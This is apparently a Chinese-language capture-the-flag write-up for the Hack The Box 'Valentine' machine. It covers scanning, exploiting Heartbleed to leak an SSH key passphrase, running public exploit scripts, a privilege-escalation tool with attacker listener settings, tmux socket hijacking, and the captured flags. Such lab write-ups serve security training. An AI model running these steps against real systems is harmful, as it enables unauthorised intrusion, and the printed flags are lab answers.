[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…

2024-08-15 167 0

信息收集

IP Address Opening Ports
10.10.10.79 TCP:22,80,443

$ nmap 10.10.10.79 --min-rate 1000 -sC -sV

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2024-08-09T11:31:53+00:00; -8m55s from scanner time.
|_http-server-header: Apache/2.2.22 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

443 SSL 心脏滴血

$ sudo nmap -p443 -script ssl-heartbleed 10.10.10.79

PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://cvedetails.com/cve/2014-0160/
|_      http://www.openssl.org/news/secadv_20140407.txt

该漏洞出现在处理心跳请求时,OpenSSL库没有正确地检查用户发送的数据的长度。心跳请求中包含一个数据块和一个声明的长度值,而OpenSSL直接根据这个声明的长度值来读取数据块。

如果攻击者在心跳请求中发送了一个较短的数据块,但伪造了一个很长的长度值,OpenSSL会读取超出数据块实际长度的内存数据(这些数据可能包含敏感信息,如私钥、用户名、密码等),并将这些数据返回给攻击者。

https://github.com/sensepost/heartbleed-poc/blob/master/heartbleed-poc.py

$ python2 heartbleed-poc.py 10.10.10.79

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图

$ echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg=='|base64 -d

heartbleedbelievethehype

目录爆破 & SSH RSA 解密

$ gobuster dir -u 'http://10.10.10.79' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -x php,txt,html

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图1

http://10.10.10.79/dev/

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图2

$ curl http://10.10.10.79/dev/hype_key | xxd -r -p >id_rsa

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图3

$ openssl rsa -in id_rsa -out id_rsa_dec

heartbleedbelievethehype

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图4

http://10.10.10.79/dev/notes.txt

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图5

$ python2 /usr/share/exploitdb/exploits/linux/remote/45939.py 10.10.10.79 'hype'

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图6

$ ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i id_rsa_dec [email protected]

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图7

User.txt

cbe0675cb30bce7dfddfd0024b0041e7

权限提升

trp00f 自动化权限提升

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10033 --pkhttpport 9090 --lxhttpport 9900

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图8

ps -aux & Tmux 进程权限提升

[Meachines] [Easy] valentine SSL心脏滴血+SSH-RSA解密+trp…插图9

$ tmux -S /.devs/dev_sess

tmux 的 -S 选项指定了一个套接字文件,这个文件用于 tmux 的客户端和服务器之间的通信。如果套接字文件的权限设置不当,可能会允许未经授权的用户访问或控制 tmux 会话,从而进行权限提升。

Root.txt

62947494f0c2ae2218423987e4d28b79


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论